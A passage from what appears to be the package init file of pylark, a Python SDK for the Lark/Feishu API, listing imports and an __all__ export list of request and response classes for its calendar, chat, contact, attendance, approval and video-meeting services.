CreateTaskResp, ) from pylark.api_service_task_task_delete import DeleteTaskReq, DeleteTaskResp from pylark.api_service_task_task_uncomplete import ( UncompleteTaskReq, UncompleteTaskResp, ) from pylark.api_service_task_task_update import ( UpdateTaskReqTaskOriginHref, UpdateTaskReqTaskOrigin, UpdateTaskReqTaskDue, UpdateTaskReqTask, UpdateTaskReq, UpdateTaskRespTaskOriginHref, UpdateTaskRespTaskOrigin, UpdateTaskRespTaskDue, UpdateTaskRespTask, UpdateTaskResp, ) from pylark.api_service_tenant import LarkTenantService from pylark.api_service_tenant_tenant_get import ( GetTenantReq, GetTenantRespTenantAvatar, GetTenantRespTenant, GetTenantResp, ) from pylark.api_service_vc import LarkVCService from pylark.api_service_vc_meeting_end import EndVCMeetingReq, EndVCMeetingResp from pylark.api_service_vc_meeting_get import ( GetVCMeetingReq, GetVCMeetingRespMeetingAbility, GetVCMeetingRespMeetingParticipant, GetVCMeetingRespMeetingHostUser, GetVCMeetingRespMeeting, GetVCMeetingResp, ) from pylark.api_service_vc_meeting_invite import ( InviteVCMeetingReqInvitee, InviteVCMeetingReq, InviteVCMeetingRespInviteResult, InviteVCMeetingResp, ) from pylark.api_service_vc_meeting_kickout import ( KickoutVCMeetingReqKickoutUser, KickoutVCMeetingReq, KickoutVCMeetingRespKickoutResult, KickoutVCMeetingResp, ) from pylark.api_service_vc_meeting_recording_get import ( GetVCMeetingRecordingReq, GetVCMeetingRecordingRespRecording, GetVCMeetingRecordingResp, ) from pylark.api_service_vc_meeting_recording_set_permission import ( SetVCPermissionMeetingRecordingReqPermissionObject, SetVCPermissionMeetingRecordingReq, SetVCPermissionMeetingRecordingResp, ) from pylark.api_service_vc_meeting_recording_start import ( StartVCMeetingRecordingReq, StartVCMeetingRecordingResp, ) from pylark.api_service_vc_meeting_recording_stop import ( StopVCMeetingRecordingReq, StopVCMeetingRecordingResp, ) from pylark.api_service_vc_meeting_set_host import ( SetVCHostMeetingReqOldHostUser, SetVCHostMeetingReqHostUser, SetVCHostMeetingReq, SetVCHostMeetingRespHostUser, SetVCHostMeetingResp, ) from pylark.api_service_vc_report_get_daily import ( GetVCDailyReportReq, GetVCDailyReportRespMeetingReportDailyReport, GetVCDailyReportRespMeetingReport, GetVCDailyReportResp, ) from pylark.api_service_vc_report_get_top_user import ( GetVCTopUserReportReq, GetVCTopUserReportRespTopUserReport, GetVCTopUserReportResp, ) from pylark.api_service_vc_reserve_apply import ( ApplyVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo, ApplyVCReserveReqMeetingSettingsCallSettingCallee, ApplyVCReserveReqMeetingSettingsCallSetting, ApplyVCReserveReqMeetingSettingsActionPermissionPermissionChecker, ApplyVCReserveReqMeetingSettingsActionPermission, ApplyVCReserveReqMeetingSettings, ApplyVCReserveReq, ApplyVCReserveRespReserve, ApplyVCReserveResp, ) from pylark.api_service_vc_reserve_delete import DeleteVCReserveReq, DeleteVCReserveResp from pylark.api_service_vc_reserve_get import ( GetVCReserveReq, GetVCReserveRespReserveMeetingSettingsCallSettingCalleePstnSipInfo, GetVCReserveRespReserveMeetingSettingsCallSettingCallee, GetVCReserveRespReserveMeetingSettingsCallSetting, GetVCReserveRespReserveMeetingSettingsActionPermissionPermissionChecker, GetVCReserveRespReserveMeetingSettingsActionPermission, GetVCReserveRespReserveMeetingSettings, GetVCReserveRespReserve, GetVCReserveResp, ) from pylark.api_service_vc_reserve_get_active_meeting import ( GetVCReserveActiveMeetingReq, GetVCReserveActiveMeetingRespMeetingAbility, GetVCReserveActiveMeetingRespMeetingParticipant, GetVCReserveActiveMeetingRespMeetingHostUser, GetVCReserveActiveMeetingRespMeeting, GetVCReserveActiveMeetingResp, ) from pylark.api_service_vc_reserve_update import ( UpdateVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo, UpdateVCReserveReqMeetingSettingsCallSettingCallee, UpdateVCReserveReqMeetingSettingsCallSetting, UpdateVCReserveReqMeetingSettingsActionPermissionPermissionChecker, UpdateVCReserveReqMeetingSettingsActionPermission, UpdateVCReserveReqMeetingSettings, UpdateVCReserveReq, UpdateVCReserveRespReserve, UpdateVCReserveResp, ) from pylark.api_service_vc_room_config_get import ( GetVCRoomConfigReq, GetVCRoomConfigRespDigitalSignageMaterial, GetVCRoomConfigRespDigitalSignage, GetVCRoomConfigResp, ) from pylark.api_service_vc_room_config_set import ( SetVCRoomConfigReqRoomConfigDigitalSignageMaterial, SetVCRoomConfigReqRoomConfigDigitalSignage, SetVCRoomConfigReqRoomConfig, SetVCRoomConfigReq, SetVCRoomConfigResp, ) from pylark.lark import Lark from pylark.lark_exception import PyLarkError from pylark.lark_request import Response, MethodOption, RawRequestReq, Request from pylark.lark_type import ( MsgType, ContainerIDType, IDType, DepartmentIDType, MailUserType, EmployeeType, ChatType, ImageType, FileType, CalendarRole, CalendarEventAttendeeType, CalendarType, CalendarPermission, AddMemberPermission, MessageVisibility, MembershipApproval, ModerationPermission, ShareCardPermission, AtAllPermission, EditPermission, HelpdeskDropdownOption, ) from pylark.lark_type_approval import ( ApprovalWidgetType, ApprovalWidget, ApprovalWidgetOption, ApprovalWidgetList, ) from pylark.lark_type_message_post import ( MessageContentPostItem, MessageContentPost, MessageContentPostAll, ) from pylark.lark_type_sheet import SheetContent, SheetRuleAttr from pylark._internal_log import logger __version__ = "0.0.13" __all__ = [ LarkACSService, GetACSAccessRecordListReq, GetACSAccessRecordListRespItem, GetACSAccessRecordListResp, GetACSAccessRecordPhotoReq, GetACSAccessRecordPhotoResp, GetACSAccessRecordPhotoResp, GetACSDeviceListReq, GetACSDeviceListRespItem, GetACSDeviceListResp, GetACSUserFaceReq, GetACSUserFaceResp, GetACSUserFaceResp, UpdateACSUserFaceReq, UpdateACSUserFaceResp, GetACSUserReq, GetACSUserRespUserFeature, GetACSUserRespUser, GetACSUserResp, GetACSUserListReq, GetACSUserListRespItemFeature, GetACSUserListRespItem, GetACSUserListResp, UpdateACSUserReqFeature, UpdateACSUserReq, UpdateACSUserResp, LarkAdminService, GetAdminDeptStatsReq, GetAdminDeptStatsRespItem, GetAdminDeptStatsResp, GetAdminUserStatsReq, GetAdminUserStatsRespItem, GetAdminUserStatsResp, LarkAIService, DetectFaceAttributesReq, DetectFaceAttributesRespFaceInfoQualityOcclude, DetectFaceAttributesRespFaceInfoQuality, DetectFaceAttributesRespFaceInfoAttributeMask, DetectFaceAttributesRespFaceInfoAttributeGlass, DetectFaceAttributesRespFaceInfoAttributeHat, DetectFaceAttributesRespFaceInfoAttributePose, DetectFaceAttributesRespFaceInfoAttributeEmotion, DetectFaceAttributesRespFaceInfoAttributeGender, DetectFaceAttributesRespFaceInfoAttribute, DetectFaceAttributesRespFaceInfoPositionLowerRight, DetectFaceAttributesRespFaceInfoPositionUpperLeft, DetectFaceAttributesRespFaceInfoPosition, DetectFaceAttributesRespFaceInfo, DetectFaceAttributesRespImageInfo, DetectFaceAttributesResp, DetectTextLanguageReq, DetectTextLanguageResp, RecognizeBasicImageReq, RecognizeBasicImageResp, RecognizeSpeechFileReqConfig, RecognizeSpeechFileReqSpeech, RecognizeSpeechFileReq, RecognizeSpeechFileResp, RecognizeSpeechStreamReqConfig, RecognizeSpeechStreamReqSpeech, RecognizeSpeechStreamReq, RecognizeSpeechStreamResp, TranslateTextReqGlossary, TranslateTextReq, TranslateTextResp, LarkApplicationService, GetApplicationAppAdminUserListReq, GetApplicationAppAdminUserListRespUserOpenID, GetApplicationAppAdminUserListRespUser, GetApplicationAppAdminUserListResp, GetApplicationAppListReq, GetApplicationAppListRespAppList, GetApplicationAppListResp, GetApplicationAppVisibilityReq, GetApplicationAppVisibilityRespUser, GetApplicationAppVisibilityRespDepartment, GetApplicationAppVisibilityResp, UpdateApplicationAppVisibilityReqAddUsers, UpdateApplicationAppVisibilityReqDelUsers, UpdateApplicationAppVisibilityReq, UpdateApplicationAppVisibilityResp, IsApplicationUserAdminReq, IsApplicationUserAdminResp, GetApplicationMessageDetailReq, GetApplicationMessageDetailRespUsersRead, GetApplicationMessageDetailRespTarget, GetApplicationMessageDetailResp, GetApplicationMessageOverviewReq, GetApplicationMessageOverviewRespGroupReadPv, GetApplicationMessageOverviewRespGroupRead, GetApplicationMessageOverviewRespGroupReceivedPv, GetApplicationMessageOverviewRespGroupReceived, GetApplicationMessageOverviewRespGroupSentPv, GetApplicationMessageOverviewRespGroupSent, GetApplicationMessageOverviewRespP2pReadPv, GetApplicationMessageOverviewRespP2pRead, GetApplicationMessageOverviewRespP2pReceivedPv, GetApplicationMessageOverviewRespP2pReceived, GetApplicationMessageOverviewRespP2pSentPv, GetApplicationMessageOverviewRespP2pSent, GetApplicationMessageOverviewResp, GetApplicationMessageTrendReq, GetApplicationMessageTrendRespGroupReadTimestamp, GetApplicationMessageTrendRespGroupRead, GetApplicationMessageTrendRespGroupReceivedTimestamp, GetApplicationMessageTrendRespGroupReceived, GetApplicationMessageTrendRespGroupSentTimestamp, GetApplicationMessageTrendRespGroupSent, GetApplicationMessageTrendRespP2pReadTimestamp, GetApplicationMessageTrendRespP2pRead, GetApplicationMessageTrendRespP2pReceivedTimestamp, GetApplicationMessageTrendRespP2pReceived, GetApplicationMessageTrendRespP2pSentTimestamp, GetApplicationMessageTrendRespP2pSent, GetApplicationMessageTrendResp, GetApplicationOrderReq, GetApplicationOrderRespOrder, GetApplicationOrderResp, GetApplicationOrderListReq, GetApplicationOrderListRespOrderList, GetApplicationOrderListResp, CheckUserIsInApplicationPaidScopeReq, CheckUserIsInApplicationPaidScopeResp, GetApplicationUsageDetailReqFilter, GetApplicationUsageDetailReq, GetApplicationUsageDetailRespUser, GetApplicationUsageDetailResp, GetApplicationUsageOverviewReq, GetApplicationUsageOverviewRespItem, GetApplicationUsageOverviewResp, GetApplicationUsageTrendReqFilter, GetApplicationUsageTrendReq, GetApplicationUsageTrendRespItemTrend, GetApplicationUsageTrendRespItem, GetApplicationUsageTrendResp, GetApplicationUserAdminScopeReq, GetApplicationUserAdminScopeResp, GetApplicationUserVisibleAppReq, GetApplicationUserVisibleAppRespAppList, GetApplicationUserVisibleAppResp, LarkApprovalService, GetApprovalReq, GetApprovalRespViewer, GetApprovalRespNode, GetApprovalResp, CreateApprovalCarbonCopyReq, CreateApprovalCarbonCopyResp, SearchApprovalCarbonCopyReq, SearchApprovalCarbonCopyRespCcLink, SearchApprovalCarbonCopyRespCc, SearchApprovalCarbonCopyRespInstanceLink, SearchApprovalCarbonCopyRespInstance, SearchApprovalCarbonCopyRespGroup, SearchApprovalCarbonCopyRespApprovalExternal, SearchApprovalCarbonCopyRespApproval, SearchApprovalCarbonCopyResp, SearchApprovalCarbonCopyResp, UploadApprovalFileReq, UploadApprovalFileResp, GetApprovalUserTaskListReq, GetApprovalUserTaskListRespCount, GetApprovalUserTaskListRespTaskURLs, GetApprovalUserTaskListRespTask, GetApprovalUserTaskListResp, AddApprovalInstanceSignReq, AddApprovalInstanceSignResp, ApproveApprovalInstanceReq, ApproveApprovalInstanceResp, CancelApprovalInstanceReq, CancelApprovalInstanceResp, CreateApprovalInstanceReq, CreateApprovalInstanceResp, GetApprovalInstanceReq, GetApprovalInstanceRespTimelineExt, GetApprovalInstanceRespTimelineCcUser, GetApprovalInstanceRespTimeline, GetApprovalInstanceRespComment, GetApprovalInstanceRespTask, GetApprovalInstanceResp, GetApprovalInstanceListReq, GetApprovalInstanceListResp, PreviewApprovalInstanceReqForm, PreviewApprovalInstanceReq, PreviewApprovalInstanceResp, RejectApprovalInstanceReq, RejectApprovalInstanceResp, SearchApprovalInstanceReq, SearchApprovalInstanceRespInstanceInstanceLink, SearchApprovalInstanceRespInstanceInstance, SearchApprovalInstanceRespInstanceApprovalGroup, SearchApprovalInstanceRespInstanceApprovalExternal, SearchApprovalInstanceRespInstanceApproval, SearchApprovalInstanceRespInstance, SearchApprovalInstanceResp, TransferApprovalInstanceReq, TransferApprovalInstanceResp, UpdateApprovalMessageReq, UpdateApprovalMessageResp, SearchApprovalTaskReq, SearchApprovalTaskRespTaskTaskLink, SearchApprovalTaskRespTaskTask, SearchApprovalTaskRespTaskInstanceLink, SearchApprovalTaskRespTaskInstance, SearchApprovalTaskRespTaskGroup, SearchApprovalTaskRespTaskApprovalExternal, SearchApprovalTaskRespTaskApproval, SearchApprovalTaskRespTask, SearchApprovalTaskResp, LarkAttendanceService, DownloadAttendanceFileReq, DownloadAttendanceFileResp, DownloadAttendanceFileResp, UploadAttendanceFileReq, UploadAttendanceFileRespFile, UploadAttendanceFileResp, CreateUpdateAttendanceGroupReqGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupReqGroupNeedPunchSpecialDay, CreateUpdateAttendanceGroupReqGroupFreePunchCfg, CreateUpdateAttendanceGroupReqGroupLocation, CreateUpdateAttendanceGroupReqGroupMachine, CreateUpdateAttendanceGroupReqGroup, CreateUpdateAttendanceGroupReq, CreateUpdateAttendanceGroupRespGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupFreePunchCfg, CreateUpdateAttendanceGroupRespGroupLocation, CreateUpdateAttendanceGroupRespGroupMachine, CreateUpdateAttendanceGroupRespGroup, CreateUpdateAttendanceGroupResp, DeleteAttendanceGroupReq, DeleteAttendanceGroupResp, GetAttendanceGroupReq, GetAttendanceGroupRespGroupIDNoNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDFreePunchCfg, GetAttendanceGroupRespGroupIDLocation, GetAttendanceGroupRespGroupIDMachine, GetAttendanceGroupRespGroupID, GetAttendanceGroupResp, InitAttendanceRemedyApprovalReq, InitAttendanceRemedyApprovalRespUserRemedy, InitAttendanceRemedyApprovalResp, UpdateAttendanceRemedyApprovalReq, UpdateAttendanceRemedyApprovalRespApprovalInfo, UpdateAttendanceRemedyApprovalResp, CreateAttendanceShiftReqRestTimeRule, CreateAttendanceShiftReqLateOffLateOnRule, CreateAttendanceShiftReqPunchTimeRule, CreateAttendanceShiftReq, CreateAttendanceShiftRespShiftRestTimeRule, CreateAttendanceShiftRespShiftLateOffLateOnRule, CreateAttendanceShiftRespShiftPunchTimeRule, CreateAttendanceShiftRespShift, CreateAttendanceShiftResp, DeleteAttendanceShiftReq, DeleteAttendanceShiftResp, GetAttendanceShiftByIDReq, GetAttendanceShiftByIDRespRestTimeRule, GetAttendanceShiftByIDRespLateOffLateOnRule, GetAttendanceShiftByIDRespPunchTimeRule, GetAttendanceShiftByIDResp, GetAttendanceShiftByNameReq, GetAttendanceShiftByNameRespRestTimeRule, GetAttendanceShiftByNameRespLateOffLateOnRule, GetAttendanceShiftByNameRespPunchTimeRule, GetAttendanceShiftByNameResp, GetAttendanceStatisticsDataReq, GetAttendanceStatisticsDataRespUserDataDataFeature, GetAttendanceStatisticsDataRespUserDataData, GetAttendanceStatisticsDataRespUserData, GetAttendanceStatisticsDataResp, GetAttendanceStatisticsHeaderReq, GetAttendanceStatisticsHeaderRespUserStatsFieldFieldChildField, GetAttendanceStatisticsHeaderRespUserStatsFieldField, GetAttendanceStatisticsHeaderRespUserStatsField, GetAttendanceStatisticsHeaderResp, GetAttendanceUserAllowedRemedyReq, GetAttendanceUserAllowedRemedyRespUserAllowedRemedys, GetAttendanceUserAllowedRemedyResp, CreateAttendanceUserApprovalReqUserApprovalTrip, CreateAttendanceUserApprovalReqUserApprovalOvertimeWork, CreateAttendanceUserApprovalReqUserApprovalLeave, CreateAttendanceUserApprovalReqUserApprovalOut, CreateAttendanceUserApprovalReqUserApproval, CreateAttendanceUserApprovalReq, CreateAttendanceUserApprovalRespUserApprovalTrip, CreateAttendanceUserApprovalRespUserApprovalOvertimeWork, CreateAttendanceUserApprovalRespUserApprovalLeave, CreateAttendanceUserApprovalRespUserApprovalOut, CreateAttendanceUserApprovalRespUserApproval, CreateAttendanceUserApprovalResp, GetAttendanceUserApprovalReq, GetAttendanceUserApprovalRespUserApprovalTrip, GetAttendanceUserApprovalRespUserApprovalOvertimeWork, GetAttendanceUserApprovalRespUserApprovalLeave, GetAttendanceUserApprovalRespUserApprovalOut, GetAttendanceUserApprovalRespUserApproval, GetAttendanceUserApprovalResp, CreateUpdateAttendanceUserDailyShiftReqUserDailyShift, CreateUpdateAttendanceUserDailyShiftReq, CreateUpdateAttendanceUserDailyShiftRespUserDailyShift, CreateUpdateAttendanceUserDailyShiftResp, GetAttendanceUserDailyShiftReq, GetAttendanceUserDailyShiftRespUserDailyShift, GetAttendanceUserDailyShiftResp, BatchCreateAttendanceUserFlowReqFlowRecord, BatchCreateAttendanceUserFlowReq, BatchCreateAttendanceUserFlowRespFlowRecord, BatchCreateAttendanceUserFlowResp, BatchGetAttendanceUserFlowReq, BatchGetAttendanceUserFlowRespUserFlowResult, BatchGetAttendanceUserFlowResp, GetAttendanceUserFlowReq, GetAttendanceUserFlowResp, QueryAttendanceUserSettingsReq, QueryAttendanceUserSettingsRespUserSetting, QueryAttendanceUserSettingsResp, UpdateAttendanceUserSettingsReqUserSetting, UpdateAttendanceUserSettingsReq, UpdateAttendanceUserSettingsRespUserSetting, UpdateAttendanceUserSettingsResp, GetAttendanceUserStatisticsSettingsReq, GetAttendanceUserStatisticsSettingsRespViewItemChildItem, GetAttendanceUserStatisticsSettingsRespViewItem, GetAttendanceUserStatisticsSettingsRespView, GetAttendanceUserStatisticsSettingsResp, UpdateAttendanceUserStatisticsSettingsReqViewItemChildItem, UpdateAttendanceUserStatisticsSettingsReqViewItem, UpdateAttendanceUserStatisticsSettingsReqView, UpdateAttendanceUserStatisticsSettingsReq, UpdateAttendanceUserStatisticsSettingsRespViewItemChildItem, UpdateAttendanceUserStatisticsSettingsRespViewItem, UpdateAttendanceUserStatisticsSettingsRespView, UpdateAttendanceUserStatisticsSettingsResp, GetAttendanceUserTaskReq, GetAttendanceUserTaskRespUserTaskResultRecordCheckOutRecord, GetAttendanceUserTaskRespUserTaskResultRecordCheckInRecord, GetAttendanceUserTaskRespUserTaskResultRecord, GetAttendanceUserTaskRespUserTaskResult, GetAttendanceUserTaskResp, GetAttendanceUserTaskRemedyReq, GetAttendanceUserTaskRemedyRespUserRemedy, GetAttendanceUserTaskRemedyResp, LarkAuthService, GetAccessTokenReq, GetAccessTokenResp, RefreshAccessTokenReq, RefreshAccessTokenResp, ResendAppTicketReq, ResendAppTicketResp, GetTenantAccessTokenReq, TokenExpire, GetUserInfoReq, GetUserInfoResp, LarkBitableService, CreateBitableFieldReqPropertyOption, CreateBitableFieldReqProperty, CreateBitableFieldReq, CreateBitableFieldRespFieldPropertyOption, CreateBitableFieldRespFieldProperty, CreateBitableFieldRespField, CreateBitableFieldResp, DeleteBitableFieldReq, DeleteBitableFieldResp, GetBitableFieldListReq, GetBitableFieldListRespItemPropertyOption, GetBitableFieldListRespItemProperty, GetBitableFieldListRespItem, GetBitableFieldListResp, UpdateBitableFieldReqPropertyOption, UpdateBitableFieldReqProperty, UpdateBitableFieldReq, UpdateBitableFieldRespFieldPropertyOption, UpdateBitableFieldRespFieldProperty, UpdateBitableFieldRespField, UpdateBitableFieldResp, GetBitableMetaReq, GetBitableMetaRespApp, GetBitableMetaResp, BatchCreateBitableRecordReqRecord, BatchCreateBitableRecordReq, BatchCreateBitableRecordRespRecord, BatchCreateBitableRecordResp, BatchDeleteBitableRecordReq, BatchDeleteBitableRecordRespRecord, BatchDeleteBitableRecordResp, BatchUpdateBitableRecordReqRecord, BatchUpdateBitableRecordReq, BatchUpdateBitableRecordRespRecord, BatchUpdateBitableRecordResp, CreateBitableRecordReq, CreateBitableRecordRespRecord, CreateBitableRecordResp, DeleteBitableRecordReq, DeleteBitableRecordResp, GetBitableRecordReq, GetBitableRecordRespRecord, GetBitableRecordResp, GetBitableRecordListReq, GetBitableRecordListRespItem, GetBitableRecordListResp, UpdateBitableRecordReq, UpdateBitableRecordRespRecord, UpdateBitableRecordResp, BatchCreateBitableTableReqTable, BatchCreateBitableTableReq, BatchCreateBitableTableResp, BatchDeleteBitableTableReq, BatchDeleteBitableTableResp, CreateBitableTableReqTable, CreateBitableTableReq, CreateBitableTableResp, DeleteBitableTableReq, DeleteBitableTableResp, GetBitableTableListReq, GetBitableTableListRespItem, GetBitableTableListResp, CreateBitableViewReq, CreateBitableViewRespApptableview, CreateBitableViewResp, DeleteBitableViewReq, DeleteBitableViewResp, GetBitableViewListReq, GetBitableViewListRespItem, GetBitableViewListResp, LarkBotService, AddBotToChatReq, AddBotToChatResp, GetBotInfoReq, GetBotInfoResp, LarkCalendarService, CreateCalendarACLReqScope, CreateCalendarACLReq, CreateCalendarACLRespScope, CreateCalendarACLResp, DeleteCalendarACLReq, DeleteCalendarACLResp, GetCalendarACLListReq, GetCalendarACLListRespACLScope, GetCalendarACLListRespACL, GetCalendarACLListResp, SubscribeCalendarACLReq, SubscribeCalendarACLResp, CreateCalendarReq, CreateCalendarRespCalendar, CreateCalendarResp, DeleteCalendarReq, DeleteCalendarResp, GetCalendarEventAttendeeChatMemberListReq, GetCalendarEventAttendeeChatMemberListRespItem, GetCalendarEventAttendeeChatMemberListResp, CreateCalendarEventAttendeeReqAttendee, CreateCalendarEventAttendeeReq, CreateCalendarEventAttendeeRespAttendeeChatMember, CreateCalendarEventAttendeeRespAttendee, CreateCalendarEventAttendeeResp, DeleteCalendarEventAttendeeReq, DeleteCalendarEventAttendeeResp, GetCalendarEventAttendeeListReq, GetCalendarEventAttendeeListRespItemChatMember, GetCalendarEventAttendeeListRespItem, GetCalendarEventAttendeeListResp, CreateCalendarEventReqSchema, CreateCalendarEventReqReminder, CreateCalendarEventReqLocation, CreateCalendarEventReqVchat, CreateCalendarEventReqEndTime, CreateCalendarEventReqStartTime, CreateCalendarEventReq, CreateCalendarEventRespEventSchema, CreateCalendarEventRespEventReminder, CreateCalendarEventRespEventLocation, CreateCalendarEventRespEventVchat, CreateCalendarEventRespEventEndTime, CreateCalendarEventRespEventStartTime, CreateCalendarEventRespEvent, CreateCalendarEventResp, DeleteCalendarEventReq, DeleteCalendarEventResp, GetCalendarEventReq, GetCalendarEventRespEventSchema, GetCalendarEventRespEventReminder, GetCalendarEventRespEventLocation, GetCalendarEventRespEventVchat, GetCalendarEventRespEventEndTime, GetCalendarEventRespEventStartTime, GetCalendarEventRespEvent, GetCalendarEventResp, GetCalendarEventListReq, GetCalendarEventListRespItemSchema, GetCalendarEventListRespItemReminder, GetCalendarEventListRespItemLocation, GetCalendarEventListRespItemVchat, GetCalendarEventListRespItemEndTime, GetCalendarEventListRespItemStartTime, GetCalendarEventListRespItem, GetCalendarEventListResp, UpdateCalendarEventReqSchema, UpdateCalendarEventReqReminder, UpdateCalendarEventReqLocation, UpdateCalendarEventReqVchat, UpdateCalendarEventReqEndTime, UpdateCalendarEventReqStartTime, UpdateCalendarEventReq, UpdateCalendarEventRespEventSchema, UpdateCalendarEventRespEventReminder, UpdateCalendarEventRespEventLocation, UpdateCalendarEventRespEventVchat, UpdateCalendarEventRespEventEndTime, UpdateCalendarEventRespEventStartTime, UpdateCalendarEventRespEvent, UpdateCalendarEventResp, SearchCalendarEventReqFilterEndTime, SearchCalendarEventReqFilterStartTime, SearchCalendarEventReqFilter, SearchCalendarEventReq, SearchCalendarEventRespItemSchema, SearchCalendarEventRespItemReminder, SearchCalendarEventRespItemLocation, SearchCalendarEventRespItemVchat, SearchCalendarEventRespItemEndTime, SearchCalendarEventRespItemStartTime, SearchCalendarEventRespItem, SearchCalendarEventResp, SubscribeCalendarEventReq, SubscribeCalendarEventResp, GetCalendarFreeBusyListReq, GetCalendarFreeBusyListRespFreebusy, GetCalendarFreeBusyListResp, GetCalendarReq, GetCalendarResp, GetCalendarListReq, GetCalendarListRespCalendar, GetCalendarListResp, UpdateCalendarReq, UpdateCalendarRespCalendar, UpdateCalendarResp, SearchCalendarReq, SearchCalendarRespItem, SearchCalendarResp, SubscribeCalendarReq, SubscribeCalendarRespCalendar, SubscribeCalendarResp, SubscribeCalendarChangeEventReq, SubscribeCalendarChangeEventResp, CreateCalendarTimeoffEventReq, CreateCalendarTimeoffEventResp, DeleteCalendarTimeoffEventReq, DeleteCalendarTimeoffEventResp, UnsubscribeCalendarReq, UnsubscribeCalendarResp, GenerateCaldavConfReq, GenerateCaldavConfResp, LarkChatService, GetChatAnnouncementReq, GetChatAnnouncementResp, UpdateChatAnnouncementReq, UpdateChatAnnouncementResp, CreateChatReq, CreateChatResp, DeleteChatReq, DeleteChatResp, GetChatReq, GetChatResp, GetChatListOfSelfReq, GetChatListOfSelfRespItem, GetChatListOfSelfResp, GetChatOldReq, GetChatOldRespMember, GetChatOldResp, JoinChatReq, JoinChatResp, AddChatMemberReq, AddChatMemberResp, DeleteChatMemberReq, DeleteChatMemberResp, GetChatMemberListReq, GetChatMemberListRespItem, GetChatMemberListResp, IsInChatReq, IsInChatResp, SearchChatReq, SearchChatRespItem, SearchChatResp, UpdateChatReq, UpdateChatResp, LarkContactService, GetContactCustomAttrListReq, GetContactCustomAttrListRespItemI18nName, GetContactCustomAttrListRespItemOptionsOption, GetContactCustomAttrListRespItemOptions, GetContactCustomAttrListRespItem, GetContactCustomAttrListResp, CreateDepartmentReqI18nName, CreateDepartmentReq, CreateDepartmentRespDepartmentStatus, CreateDepartmentRespDepartmentI18nName, CreateDepartmentRespDepartment, CreateDepartmentResp, DeleteDepartmentReq, DeleteDepartmentResp, GetDepartmentReq, GetDepartmentRespDepartmentStatus, GetDepartmentRespDepartmentI18nName, GetDepartmentRespDepartment, GetDepartmentResp, GetDepartmentListReq, GetDepartmentListRespItemStatus, GetDepartmentListRespItemI18nName, GetDepartmentListRespItem, GetDepartmentListResp, GetParentDepartmentReq, GetParentDepartmentRespItemStatus, GetParentDepartmentRespItemI18nName, GetParentDepartmentRespItem, GetParentDepartmentResp, SearchDepartmentReq, SearchDepartmentRespItemStatus, SearchDepartmentRespItemI18nName, SearchDepartmentRespItem, SearchDepartmentResp, UpdateDepartmentReqI18nName, UpdateDepartmentReq, UpdateDepartmentRespDepartmentStatus, UpdateDepartmentRespDepartmentI18nName, UpdateDepartmentRespDepartment, UpdateDepartmentResp, UpdateDepartmentPatchReqI18nName, UpdateDepartmentPatchReq, UpdateDepartmentPatchRespDepartmentStatus, UpdateDepartmentPatchRespDepartmentI18nName, UpdateDepartmentPatchRespDepartment, UpdateDepartmentPatchResp, CreateEmployeeTypeEnumReqI18nContent, CreateEmployeeTypeEnumReq, CreateEmployeeTypeEnumRespEmployeeTypeEnumI18nContent, CreateEmployeeTypeEnumRespEmployeeTypeEnum, CreateEmployeeTypeEnumResp, DeleteEmployeeTypeEnumReq, DeleteEmployeeTypeEnumResp, GetEmployeeTypeEnumListReq, GetEmployeeTypeEnumListRespItemI18nContent, GetEmployeeTypeEnumListRespItem, GetEmployeeTypeEnumListResp, UpdateEmployeeTypeEnumPatchReqI18nContent, UpdateEmployeeTypeEnumPatchReq, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnumI18nContent, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnum, UpdateEmployeeTypeEnumPatchResp, DeleteContactGroupReq, DeleteContactGroupResp, GetContactGroupReq, GetContactGroupRespGroup, GetContactGroupResp, CreateContactGroupReq, CreateContactGroupResp, GetContactGroupListReq, GetContactGroupListRespGroup, GetContactGroupListResp, AddContactGroupMemberReq, AddContactGroupMemberResp, DeleteContactGroupMemberReq, DeleteContactGroupMemberResp, GetContactGroupMemberReq, GetContactGroupMemberRespMember, GetContactGroupMemberResp, UpdateContactGroupReq, UpdateContactGroupResp, BindContactUnitDepartmentReq, BindContactUnitDepartmentResp, CreateContactUnitReq, CreateContactUnitResp, DeleteContactUnitReq, DeleteContactUnitResp, GetContactUnitReq, GetContactUnitRespUnit, GetContactUnitResp, GetContactUnitListReq, GetContactUnitListRespUnit, GetContactUnitListResp, GetContactUnitDepartmentListReq, GetContactUnitDepartmentListRespDepartment, GetContactUnitDepartmentListResp, UnbindContactUnitDepartmentReq, UnbindContactUnitDepartmentResp, UpdateContactUnitReq, UpdateContactUnitResp, CreateUserReqNotificationOption, CreateUserReqCustomAttrValueGenericUser, CreateUserReqCustomAttrValue, CreateUserReqCustomAttr, CreateUserReqOrder, CreateUserReq, CreateUserRespUserNotificationOption, CreateUserRespUserCustomAttrValueGenericUser, CreateUserRespUserCustomAttrValue, CreateUserRespUserCustomAttr, CreateUserRespUserOrder, CreateUserRespUserStatus, CreateUserRespUserAvatar, CreateUserRespUser, CreateUserResp, DeleteUserReq, DeleteUserResp, GetUserReq, GetUserRespUserCustomAttrValueGenericUser, GetUserRespUserCustomAttrValue, GetUserRespUserCustomAttr, GetUserRespUserOrder, GetUserRespUserStatus, GetUserRespUserAvatar, GetUserRespUser, GetUserResp, BatchGetUserReq, BatchGetUserRespUserInfo, BatchGetUserResp, BatchGetUserByIDReq, BatchGetUserByIDRespEmailUser, BatchGetUserByIDRespEmailUser, BatchGetUserByIDResp, GetUserListReq, GetUserListRespItemCustomAttrValueGenericUser, GetUserListRespItemCustomAttrValue, GetUserListRespItemCustomAttr, GetUserListRespItemOrder, GetUserListRespItemStatus, GetUserListRespItemAvatar, GetUserListRespItem, GetUserListResp, SearchUserOldReq, SearchUserOldRespUserAvatar, SearchUserOldRespUser, SearchUserOldResp, UpdateUserReqCustomAttrValueGenericUser, UpdateUserReqCustomAttrValue, UpdateUserReqCustomAttr, UpdateUserReqOrder, UpdateUserReq, UpdateUserRespUserNotificationOption, UpdateUserRespUserCustomAttrValueGenericUser, UpdateUserRespUserCustomAttrValue, UpdateUserRespUserCustomAttr, UpdateUserRespUserOrder, UpdateUserRespUserStatus, UpdateUserRespUserAvatar, UpdateUserRespUser, UpdateUserResp, 